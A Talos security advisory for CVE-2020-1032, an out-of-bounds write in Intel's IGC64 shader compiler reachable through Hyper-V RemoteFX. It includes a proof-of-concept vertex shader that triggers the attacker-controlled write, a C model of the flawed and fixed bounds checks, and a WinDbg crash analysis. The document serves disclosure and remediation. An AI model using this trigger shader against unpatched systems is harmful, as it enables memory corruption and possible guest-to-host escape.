Microsoft Hyper-V/RemoteFX: CVE-2020-1032
An exploitable memory corruption vulnerability exists in Intel's IGC64.DLL graphics driver, version 26.20.100.7584. A specially crafted vertex shader can cause an out-of-bounds write, which could lead to arbitrary code execution. An attacker can provide a specially crafted shader file to trigger this vulnerability. Because the shader is compiled by the host-side driver, this vulnerability could potentially be triggered from guest machines running on virtualization environments (e.g. VMware, QEMU, VirtualBox etc.) to perform a guest-to-host escape, as was demonstrated before in TALOS-2018-0533, TALOS-2018-0568, etc. Theoretically, this vulnerability could also be triggered from a web browser (using WebGL and WebAssembly), but Talos has not been able to confirm this.
Intel IGC64.DLL (Intel Graphics Shader Compiler for Intel(R) Graphics Accelerator), version 26.20.100.7584
Microsoft Hyper-V with RemoteFX enabled (CVE-2020-1032)
8.5 - CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H
CWE-787: Out-of-bounds Write
This vulnerability can be triggered by supplying a malformed vertex shader, leading to an out-of-bounds write in the Intel IGC64 driver (a user-mode DLL that is mapped into the process of whichever component compiles the shader, e.g. VMware's vmware-vmx.exe; in the crash below it is the PoC process itself, reached through d3d11.dll and igd10iumd64.dll).
Here’s an example of a vertex shader triggering the bug:
vs_4_1
dcl_globalFlags refactoringAllowed
dcl_input v0.xy
dcl_output_siv o0.xyzw, position
dcl_output o1.xyzw
dcl_output o211343.xyzw
dcl_temps 1
mul o0.xy, v0.xyxx, l(1.000000, -1.000000, 0.000000, 0.000000)
mov o0.zw, l(0,0,0.500000,1.000000)
mov r0.xy, v0.xyxx
mov r0.zw, l(0,0,0,1.000000)
mov o1.xyzw, r0.xyzw
mov o2.xyzw, r0.xyzw
ret
DCL_OUTPUT is a shader model instruction that declares a shader-output register (where oN is an output data register and N is an integer that denotes the register number). By supplying a specially crafted N value, it is possible to trigger the memory corruption vulnerability in the IGC64 driver.
An important fact is that the attacker controls the RBX register (used as the index in the destination address calculation), since this value is taken directly from the shader: in the crash below rbx=0x33993 (211347), offset by 4 from the declared register number 211343, and the faulting store is mov qword ptr [rax+rbx*8],rdi. This gives the attacker control over the destination address of an 8-byte memory write. Note that the fault occurs while the shader object is being created (d3d11!CDevice::CreateVertexShader is on the stack), i.e. at compile time, before any draw call is issued.
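The following is an added example, not the Talos PoC and not Intel's driver code. It models the unchecked indexed store behind the crash: the register number N is parsed from the dcl_output line exactly as written in the shader and used as an index into a fixed-size per-shader output-register table. The table size of 32 (o0..o31 for shader model 4) is an assumption made for the example, as are all function names. The vulnerable variant only computes the address the store would hit (it does not perform the write), so it can be checked against the rax/rbx values from the register dump above; the hardened variant rejects the declaration before the index is used.

```c
#include <limits.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumption for this example: a shader-model-4 vertex shader exposes
 * output registers o0..o31, so the compiler keeps a 32-entry table. */
#define OUTPUT_REG_COUNT 32UL

/* Trigger shader from the advisory, embedded inline (constructed input). */
static const char POC_SHADER[] =
    "vs_4_1\n"
    "dcl_globalFlags refactoringAllowed\n"
    "dcl_input v0.xy\n"
    "dcl_output_siv o0.xyzw, position\n"
    "dcl_output o1.xyzw\n"
    "dcl_output o211343.xyzw\n"
    "dcl_temps 1\n"
    "mov o2.xyzw, r0.xyzw\n"
    "ret\n";

/* Extract N from "dcl_output oN.mask" or "dcl_output_siv oN.mask, name".
 * Returns -1 for any line that is not an output declaration. */
static long parse_dcl_output(const char *line)
{
    const char *p;
    char *end;
    unsigned long n;

    if (strncmp(line, "dcl_output", 10) != 0)
        return -1;
    p = strchr(line, ' ');
    if (p == NULL || p[1] != 'o')
        return -1;
    n = strtoul(p + 2, &end, 10);
    if (end == p + 2 || n > LONG_MAX)
        return -1;
    return (long)n;
}

/* Address written by the faulting instruction  mov qword ptr [rax+rbx*8],rdi
 * with rax = table base and rbx = register index taken from the shader. */
static uint64_t store_target(uint64_t table_base, uint64_t reg_index)
{
    return table_base + reg_index * 8u;
}

/* Vulnerable pattern: the shader-supplied index is used with no range check.
 * The store is modelled, not performed: returns 0 when the target is inside
 * the 32-entry table, otherwise the address that would fault. */
static uint64_t declare_output_unchecked(uint64_t table_base, uint64_t reg_index)
{
    uint64_t target = store_target(table_base, reg_index);
    uint64_t table_end = table_base + OUTPUT_REG_COUNT * 8u;
    return (target < table_end) ? 0 : target;
}

/* Hardened pattern: validate the declared register number against the
 * shader-model limit before it is ever used as an index. */
static int declare_output_checked(uint64_t *table, unsigned long reg_index,
                                  uint64_t descriptor)
{
    if (reg_index >= OUTPUT_REG_COUNT)
        return -1;                      /* reject the shader at compile time */
    table[reg_index] = descriptor;
    return 0;
}

/* Walk a shader listing line by line and return the first out-of-range
 * output register number it declares, or -1 if all are within o0..o31. */
static long find_bad_output_decl(const char *text)
{
    char line[128];
    const char *cur = text;

    while (*cur != '\0') {
        const char *nl = strchr(cur, '\n');
        size_t len = nl ? (size_t)(nl - cur) : strlen(cur);
        size_t copy = len < sizeof line - 1 ? len : sizeof line - 1;
        long n;

        memcpy(line, cur, copy);
        line[copy] = '\0';
        n = parse_dcl_output(line);
        if (n >= (long)OUTPUT_REG_COUNT)
            return n;
        cur += len + (nl ? 1 : 0);
    }
    return -1;
}

int main(void)
{
    /* rax and rbx as captured in the register dump from the advisory */
    uint64_t rax = 0x1fb07205920ULL, rbx = 0x33993ULL;

    printf("out-of-range dcl_output: o%ld\n", find_bad_output_decl(POC_SHADER));
    printf("unchecked store would hit %#llx\n",
           (unsigned long long)declare_output_unchecked(rax, rbx));
    return 0;
}
```

With the dump's rax=0x1fb07205920 and rbx=0x33993 the modelled store lands at 0x1fb073a25b8, the same address WinDbg reports in Parameter[1] and WRITE_ADDRESS below, which is the quickest way to confirm that the crash is the indexed write and not some later use of the table. The same bounds check in declare_output_checked is what a fix in the compiler needs to apply to every operand index lifted from the shader bytecode, not only to dcl_output.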
0:000> r
rax=000001fb07205920 rbx=0000000000033993 rcx=000001fb07206408
rdx=000001fb031272e8 rsi=000001fb03139090 rdi=000001fb03139078
rip=00007ffc70ae85b0 rsp=0000007b978fdbe0 rbp=0000007b978fdce0
r8=000000000000000d r9=000001fb072063f0 r10=000001fb072063f0
r11=0000000000000000 r12=000001fb03138f50 r13=0000000000000000
r14=000001fb03132bb8 r15=000001fb03132b98
iopl=0 nv up ei pl nz na pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
igc64!GTPIN_IGC_OCL_UpdateKernelInfo+0x177bf0:
00007ffc`70ae85b0 48893cd8 mov qword ptr [rax+rbx*8],rdi ds:000001fb`073a25b8=????????????????
Stack trace:
0:000> kb
# RetAddr : Args to Child : Call Site
00 00007ffc`70ae90be : 00007ffc`71b0a530 000001fb`03134920 000001fb`03138ef8 000001fb`03138ef8 : igc64!GTPIN_IGC_OCL_UpdateKernelInfo+0x177bf0
01 00007ffc`711854e9 : 000001fb`03139520 000001fb`03138ef8 00000000`00000000 000001fb`031438e0 : igc64!GTPIN_IGC_OCL_UpdateKernelInfo+0x1786fe
02 00007ffc`71185673 : 000001fb`03138f30 000001fb`03140670 000001fb`0312c800 000001fb`00000000 : igc64!getJITVersion+0x4987a9
03 00007ffc`7118587d : 00000000`00000000 000001fb`0312c940 0000007b`978fe029 000001fb`0313d101 : igc64!getJITVersion+0x498933
04 00007ffc`71184e80 : 00007ffc`7092f400 000001fb`0313d400 000001fb`00000000 00007ffc`00000002 : igc64!getJITVersion+0x498b3d
05 00007ffc`70a216f5 : 00007ffc`7092f410 0000007b`978fe1d0 000001fb`03126730 000001fb`072bce40 : igc64!getJITVersion+0x498140
06 00007ffc`7130bc37 : 000001fb`03124b08 000001fb`0312b8f0 000001fb`03126730 000001fb`03126730 : igc64!GTPIN_IGC_OCL_UpdateKernelInfo+0xb0d35
07 00007ffc`7130ce3d : 000001fb`03124ad0 00007ffc`75013537 ffffffff`00000000 00000000`00000000 : igc64!OpenCompiler12+0x44a7
08 00007ffc`749a00d7 : 000001fb`031249e8 00000000`00000000 000001fb`010d77b0 00000000`00000001 : igc64!OpenCompiler12+0x56ad
09 00007ffc`750c6fab : 000001fb`010e3c60 00000000`00000003 000001fb`03126080 0000007b`978fe460 : igd10iumd64!OpenAdapter10_2+0xd8ab7
0a 00007ffc`7cc29874 : 00000000`00000000 000001fb`031244b8 000001fb`010cd890 00000000`00000000 : igd10iumd64!OpenAdapter10_2+0x7ff98b
0b 00007ffc`7cc32563 : 000001fb`010d77a8 00000000`00000000 000001fb`031244b8 000001fb`010cd890 : d3d11!CVertexShader::CLS::FinalConstruct+0x260
0c 00007ffc`7cc32726 : 0000007b`978fefa0 00007ffc`7cde2388 000001fb`03124380 00000000`00001238 : d3d11!CLayeredObjectWithCLS<CVertexShader>::FinalConstruct+0xa3
0d 00007ffc`7cc1ee08 : 000001fb`031243a8 0000007b`978fefa0 0000007b`978fefd0 00007ffc`7cde2388 : d3d11!CLayeredObjectWithCLS<CVertexShader>::CreateInstance+0x152
0e 00007ffc`7cc2b17d : 00000000`00000000 000001fb`03124380 00000000`00000000 00000000`00000000 : d3d11!CDevice::CreateLayeredChild+0xc38
0f 00007ffc`7cc2b950 : 000001fb`03124380 00000000`00000007 00000000`00000850 00000000`00000030 : d3d11!NDXGI::CDevice::CreateLayeredChild+0x6d
10 00007ffc`7cc11b00 : 000001fb`0729a6d0 00000000`00000007 00000000`0000000a 000001fb`0729af48 : d3d11!NOutermost::CDevice::CreateLayeredChild+0x1b0
11 00007ffc`7cc11a68 : 00000000`0000000a 00000000`0000c100 0000007b`978ff3c0 00000000`00000000 : d3d11!CDevice::CreateAndRecreateLayeredChild<SD3D11LayeredVertexShaderCreationArgs>+0x64
12 00007ffc`7cc11838 : 00000000`80070057 000001fb`03123de0 00000000`00000298 00000000`00000000 : d3d11!CDevice::CreateVertexShader_Worker+0x1b8
13 00007ff7`3e80261e : 00007ff7`3e875178 000001fb`00ff0000 000001fb`031381b0 00000000`00000001 : d3d11!CDevice::CreateVertexShader+0x28
14 00007ff7`3e8042a7 : 000001fb`010063c0 00000000`00000298 000001fb`0729af18 00000000`00000000 : POC_EXEC11+0x261e
15 00007ff7`3e80c880 : 00000000`00000000 000001fb`01059bc4 000001fb`01031d90 000001fb`00000298 : POC_EXEC11+0x42a7
16 00007ff7`3e80a8cc : 00000000`00000000 00000000`00000000 00000000`00000001 00007ffc`00000000 : POC_EXEC11+0xc880
17 00007ff7`3e80a26c : 00000000`00000000 0050005f`006e006f 00000000`00000000 0063006f`0070005c : POC_EXEC11+0xa8cc
18 00007ff7`3e80324a : 000001fb`01031d90 00000000`00000000 000001fb`01031d90 000001fb`00ffce30 : POC_EXEC11+0xa26c
19 00007ff7`3e82f5aa : 00000000`0000000a 00000000`00000000 00000000`00000000 00000000`00000000 : POC_EXEC11+0x324a
1a 00007ffc`82497bd4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : POC_EXEC11+0x2f5aa
1b 00007ffc`8380ced1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
1c 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
0:000> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
KEY_VALUES_STRING: 1
Key : AV.Fault
Value: Write
Key : Analysis.CPU.Sec
Value: 1
Key : Analysis.Elapsed.Sec
Value: 97
Key : Analysis.Memory.CommitPeak.Mb
Value: 70
Key : Timeline.OS.Boot.DeltaSec
Value: 120876
Key : Timeline.Process.Start.DeltaSec
Value: 803
PROCESSES_ANALYSIS: 1
SERVICE_ANALYSIS: 1
STACKHASH_ANALYSIS: 1
TIMELINE_ANALYSIS: 1
Timeline: !analyze.Start
Name: <blank>
Time: 2020-01-12T13:04:43.691Z
Diff: 691 mSec
Timeline: Dump.Current
Name: <blank>
Time: 2020-01-12T13:04:43.0Z
Diff: 0 mSec
Timeline: Process.Start
Name: <blank>
Time: 2020-01-12T12:51:20.0Z
Diff: 803000 mSec
Timeline: OS.Boot
Name: <blank>
Time: 2020-01-11T03:30:07.0Z
Diff: 120876000 mSec
DUMP_CLASS: 2
DUMP_QUALIFIER: 0
MODLIST_WITH_TSCHKSUM_HASH: 72b14d4437af6d09da2d9fe2a592f06ddf20b1ca
MODLIST_SHA1_HASH: 6ce0e83b6da7c6a553d1e322f42f958f3d7a27e9
NTGLOBALFLAG: 70
APPLICATION_VERIFIER_FLAGS: 0
PRODUCT_TYPE: 1
SUITE_MASK: 272
DUMP_TYPE: fe
FAULTING_IP:
igc64!GTPIN_IGC_OCL_UpdateKernelInfo+177bf0
00007ffc`70ae85b0 48893cd8 mov qword ptr [rax+rbx*8],rdi
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 00007ffc70ae85b0 (igc64!GTPIN_IGC_OCL_UpdateKernelInfo+0x0000000000177bf0)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 0000000000000001
Parameter[1]: 000001fb073a25b8
Attempt to write to address 000001fb073a25b8
FAULTING_THREAD: 00003578
DEFAULT_BUCKET_ID: INVALID_POINTER_WRITE
PROCESS_NAME: POC_EXEC11.exe
FOLLOWUP_IP:
igc64!GTPIN_IGC_OCL_UpdateKernelInfo+177bf0
00007ffc`70ae85b0 48893cd8 mov qword ptr [rax+rbx*8],rdi
WRITE_ADDRESS: 000001fb073a25b8
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. (message text localized, OS_LOCALE is PLK)
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE_STR: c0000005
EXCEPTION_PARAMETER1: 0000000000000001
EXCEPTION_PARAMETER2: 000001fb073a25b8
WATSON_BKT_PROCSTAMP: 5e1b04b9
WATSON_BKT_MODULE: igc64.dll
WATSON_BKT_MODSTAMP: 5ddcfccd
WATSON_BKT_MODOFFSET: 2285b0
WATSON_BKT_MODVER: 26.20.100.7584
MODULE_VER_PRODUCT: Intel HD Graphics Drivers for Windows(R)
BUILD_VERSION_STRING: 18362.1.amd64fre.19h1_release.190318-1202
ANALYSIS_SESSION_HOST: IAMLEGION
ANALYSIS_SESSION_TIME: 01-12-2020 14:04:43.0691
ANALYSIS_VERSION: 10.0.18914.1001 amd64fre
THREAD_ATTRIBUTES:
OS_LOCALE: PLK
BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE
PRIMARY_PROBLEM_CLASS: APPLICATION_FAULT
PROBLEM_CLASSES:
ID: [0n313]
Type: [@ACCESS_VIOLATION]
Class: Addendum
Scope: BUCKET_ID
Name: Omit
Data: Omit
PID: [Unspecified]
TID: [0x3578]
Frame: [0] : igc64!GTPIN_IGC_OCL_UpdateKernelInfo
ID: [0n286]
Type: [INVALID_POINTER_WRITE]
Class: Primary
Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
BUCKET_ID
Name: Add
Data: Omit
PID: [Unspecified]
TID: [0x3578]
Frame: [0] : igc64!GTPIN_IGC_OCL_UpdateKernelInfo
LAST_CONTROL_TRANSFER: from 00007ffc70ae90be to 00007ffc70ae85b0
STACK_TEXT:
0000007b`978fdbe0 00007ffc`70ae90be : 00007ffc`71b0a530 000001fb`03134920 000001fb`03138ef8 000001fb`03138ef8 : igc64!GTPIN_IGC_OCL_UpdateKernelInfo+0x177bf0
0000007b`978fde40 00007ffc`711854e9 : 000001fb`03139520 000001fb`03138ef8 00000000`00000000 000001fb`031438e0 : igc64!GTPIN_IGC_OCL_UpdateKernelInfo+0x1786fe
0000007b`978fde80 00007ffc`71185673 : 000001fb`03138f30 000001fb`03140670 000001fb`0312c800 000001fb`00000000 : igc64!getJITVersion+0x4987a9
0000007b`978fdf70 00007ffc`7118587d : 00000000`00000000 000001fb`0312c940 0000007b`978fe029 000001fb`0313d101 : igc64!getJITVersion+0x498933
0000007b`978fdfa0 00007ffc`71184e80 : 00007ffc`7092f400 000001fb`0313d400 000001fb`00000000 00007ffc`00000002 : igc64!getJITVersion+0x498b3d
0000007b`978fe090 00007ffc`70a216f5 : 00007ffc`7092f410 0000007b`978fe1d0 000001fb`03126730 000001fb`072bce40 : igc64!getJITVersion+0x498140
0000007b`978fe0d0 00007ffc`7130bc37 : 000001fb`03124b08 000001fb`0312b8f0 000001fb`03126730 000001fb`03126730 : igc64!GTPIN_IGC_OCL_UpdateKernelInfo+0xb0d35
0000007b`978fe200 00007ffc`7130ce3d : 000001fb`03124ad0 00007ffc`75013537 ffffffff`00000000 00000000`00000000 : igc64!OpenCompiler12+0x44a7
0000007b`978fe2c0 00007ffc`749a00d7 : 000001fb`031249e8 00000000`00000000 000001fb`010d77b0 00000000`00000001 : igc64!OpenCompiler12+0x56ad
0000007b`978fe300 00007ffc`750c6fab : 000001fb`010e3c60 00000000`00000003 000001fb`03126080 0000007b`978fe460 : igd10iumd64!OpenAdapter10_2+0xd8ab7
0000007b`978fe360 00007ffc`7cc29874 : 00000000`00000000 000001fb`031244b8 000001fb`010cd890 00000000`00000000 : igd10iumd64!OpenAdapter10_2+0x7ff98b
0000007b`978fe640 00007ffc`7cc32563 : 000001fb`010d77a8 00000000`00000000 000001fb`031244b8 000001fb`010cd890 : d3d11!CVertexShader::CLS::FinalConstruct+0x260
0000007b`978fe8c0 00007ffc`7cc32726 : 0000007b`978fefa0 00007ffc`7cde2388 000001fb`03124380 00000000`00001238 : d3d11!CLayeredObjectWithCLS<CVertexShader>::FinalConstruct+0xa3
0000007b`978fe950 00007ffc`7cc1ee08 : 000001fb`031243a8 0000007b`978fefa0 0000007b`978fefd0 00007ffc`7cde2388 : d3d11!CLayeredObjectWithCLS<CVertexShader>::CreateInstance+0x152
0000007b`978fe9b0 00007ffc`7cc2b17d : 00000000`00000000 000001fb`03124380 00000000`00000000 00000000`00000000 : d3d11!CDevice::CreateLayeredChild+0xc38
0000007b`978fedf0 00007ffc`7cc2b950 : 000001fb`03124380 00000000`00000007 00000000`00000850 00000000`00000030 : d3d11!NDXGI::CDevice::CreateLayeredChild+0x6d
0000007b`978fef60 00007ffc`7cc11b00 : 000001fb`0729a6d0 00000000`00000007 00000000`0000000a 000001fb`0729af48 : d3d11!NOutermost::CDevice::CreateLayeredChild+0x1b0
0000007b`978ff150 00007ffc`7cc11a68 : 00000000`0000000a 00000000`0000c100 0000007b`978ff3c0 00000000`00000000 : d3d11!CDevice::CreateAndRecreateLayeredChild<SD3D11LayeredVertexShaderCreationArgs>+0x64
0000007b`978ff1b0 00007ffc`7cc11838 : 00000000`80070057 000001fb`03123de0 00000000`00000298 00000000`00000000 : d3d11!CDevice::CreateVertexShader_Worker+0x1b8
0000007b`978ff320 00007ff7`3e80261e : 00007ff7`3e875178 000001fb`00ff0000 000001fb`031381b0 00000000`00000001 : d3d11!CDevice::CreateVertexShader+0x28
0000007b`978ff370 00007ff7`3e8042a7 : 000001fb`010063c0 00000000`00000298 000001fb`0729af18 00000000`00000000 : POC_EXEC11+0x261e
0000007b`978ff3e0 00007ff7`3e80c880 : 00000000`00000000 000001fb`01059bc4 000001fb`01031d90 000001fb`00000298 : POC_EXEC11+0x42a7
0000007b`978ff810 00007ff7`3e80a8cc : 00000000`00000000 00000000`00000000 00000000`00000001 00007ffc`00000000 : POC_EXEC11+0xc880
0000007b`978ff910 00007ff7`3e80a26c : 00000000`00000000 0050005f`006e006f 00000000`00000000 0063006f`0070005c : POC_EXEC11+0xa8cc
0000007b`978ffb30 00007ff7`3e80324a : 000001fb`01031d90 00000000`00000000 000001fb`01031d90 000001fb`00ffce30 : POC_EXEC11+0xa26c
0000007b`978ffd20 00007ff7`3e82f5aa : 00000000`0000000a 00000000`00000000 00000000`00000000 00000000`00000000 : POC_EXEC11+0x324a
0000007b`978ffd70 00007ffc`82497bd4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : POC_EXEC11+0x2f5aa
0000007b`978ffdb0 00007ffc`8380ced1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
0000007b`978ffde0 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
STACK_COMMAND: ~0s ; .cxr ; kb
THREAD_SHA1_HASH_MOD_FUNC: d57f9bebc1f0ae522704c56a5314607d7c2652da
THREAD_SHA1_HASH_MOD_FUNC_OFFSET: c4840d003ab418e45b60d257137034e4fc87d23c
THREAD_SHA1_HASH_MOD: 64e61bfd748d413845b2f9061b27e537f8190df5
FAULT_INSTR_CODE: d83c8948
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: igc64!GTPIN_IGC_OCL_UpdateKernelInfo+177bf0
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: igc64
IMAGE_NAME: igc64.dll
DEBUG_FLR_IMAGE_TIMESTAMP: 5ddcfccd
FAILURE_BUCKET_ID: INVALID_POINTER_WRITE_c0000005_igc64.dll!GTPIN_IGC_OCL_UpdateKernelInfo
BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_WRITE_igc64!GTPIN_IGC_OCL_UpdateKernelInfo+177bf0
FAILURE_EXCEPTION_CODE: c0000005
FAILURE_IMAGE_NAME: igc64.dll
BUCKET_ID_IMAGE_STR: igc64.dll
FAILURE_MODULE_NAME: igc64
BUCKET_ID_MODULE_STR: igc64
FAILURE_FUNCTION_NAME: GTPIN_IGC_OCL_UpdateKernelInfo
BUCKET_ID_FUNCTION_STR: GTPIN_IGC_OCL_UpdateKernelInfo
BUCKET_ID_OFFSET: 177bf0
BUCKET_ID_MODTIMEDATESTAMP: 5ddcfccd
BUCKET_ID_MODCHECKSUM: 2450ddb
BUCKET_ID_MODVER_STR: 0.0.0.0
BUCKET_ID_PREFIX_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE_
FAILURE_PROBLEM_CLASS: APPLICATION_FAULT
FAILURE_SYMBOL_NAME: igc64.dll!GTPIN_IGC_OCL_UpdateKernelInfo
TARGET_TIME: 2020-01-12T13:06:21.000Z
OSBUILD: 18362
OSSERVICEPACK: 329
SERVICEPACK_NUMBER: 0
OS_REVISION: 0
OSPLATFORM_TYPE: x64
OSNAME: Windows 10
OSEDITION: Windows 10 WinNt SingleUserTS
USER_LCID: 0
OSBUILD_TIMESTAMP: unknown_date
BUILDDATESTAMP_STR: 190318-1202
BUILDLAB_STR: 19h1_release
BUILDOSVER_STR: 10.0.18362.1.amd64fre.19h1_release.190318-1202
ANALYSIS_SESSION_ELAPSED_TIME: 17c54
ANALYSIS_SOURCE: UM
FAILURE_ID_HASH_STRING: um:invalid_pointer_write_c0000005_igc64.dll!gtpin_igc_ocl_updatekernelinfo
FAILURE_ID_HASH: {d0d40dd5-cc0a-29d9-3f8a-fdff27d36f0d}
Followup: MachineOwner
---------
2020-01-27 - Vendor Disclosure
2020-04-01 - Disclosure deadline extended
2020-07-14 - Public Release
Discovered by Piotr Bania of Cisco Talos.